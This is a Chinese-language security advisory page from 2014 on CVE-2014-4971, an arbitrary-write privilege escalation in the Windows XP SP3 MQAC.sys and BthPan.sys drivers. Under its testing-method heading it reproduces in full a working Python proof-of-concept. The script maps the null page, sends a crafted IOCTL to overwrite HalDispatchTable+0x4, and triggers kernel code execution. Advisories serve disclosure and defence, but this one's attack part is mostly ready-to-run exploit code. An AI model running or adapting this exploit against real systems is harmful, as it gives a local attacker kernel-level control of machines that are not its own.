当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

多个微软产品任意内存写权限提升漏洞

     发表日期:2014-07-28 15:36:10

多个微软产品任意内存写权限提升漏洞

BugTraq-ID:68764

CVE-ID:CVE-2014-4971

 

受影响系统:

Microsoft Windows XP XP SP3

Microsoft Bluetooth Personal Area Networking 5.1.2600.5512

Microsoft MQ Access Control 5.1.0.1110

详细信息:

 

多个微软产品(例如Bluetooth Personal Area Networking、MQ Access Control)存在多个权限提升漏洞,这些漏洞源于MQAC.sys及BthPan.sys驱动程序内的错误,通过发送特制的IOCTL请求,本地攻击者可利用此漏洞注入内存到任意位置、写入数据、获取内核级别的权限。

 

 

来源:

Matt Bergin

参考信息:

http://www.exploit-db.com/exploits/34112/

 

http://xforce.iss.net/xforce/xfdb/94753

测试方法:

警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python2

 

     #

 

     # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation

 

     # Matt Bergin (KoreLogic / Smash the Stack)

 

     # CVE-2014-4971

 

     #

 

     from ctypes import *

 

     from struct import pack

 

     from os import getpid,system

 

     from sys import exit

 

     EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA

 

     GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle

 

     INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0

 

 

 

     # thanks to offsec for the concept

 

     # I re-wrote the code as to not fully insult them :)

 

     def getBase(name=None):

 

        retArray = c_ulong*1024

 

        ImageBase = retArray()

 

        callback = c_int(1024)

 

        cbNeeded = c_long()

 

        EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))

 

        for base in ImageBase:

 

                driverName = c_char_p("\\x00"*1024)

 

                GetDeviceDriverBaseNameA(base,driverName,48)

 

                if (name):

 

                        if (driverName.value.lower() == name):

 

                                return base

 

                else:

 

                        return (base,driverName.value)

 

        return None

 

 

 

     handle = CreateFileA("\\\\\\\\.\\\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)

 

     print "[+] Handle \\\\\\\\.\\\\MQAC @ %s" % (handle)

 

     NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)

 

     buf = "\\x50\\x00\\x00\\x00"+"\\x90"*0x400

 

     WriteProcessMemory(-1, 0x1, "\\x90"*0x6000, 0x6000, byref(c_int(0)))

 

     WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))

 

     WriteProcessMemory(-1, 0x5000, "\\xcc", 77, byref(c_int(0)))

 

     #Overwrite Pointer

 

     kBase,kVer = getBase()

 

     hKernel = LoadLibraryExA(kVer,0,1)

 

     HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")

 

     HalDispatchTable -= hKernel

 

     HalDispatchTable += kBase

 

     HalDispatchTable += 0x4

 

     print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable))

 

     DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)

 

     print "[+] HalDispatchTable+0x4 overwritten"

 

     CloseHandle(handle)

 

     NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))

 

     exit(0)

解决办法:

厂商补丁:

 

Microsoft

---------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

 

 

 

http://technet.microsoft.com/security/bulletin/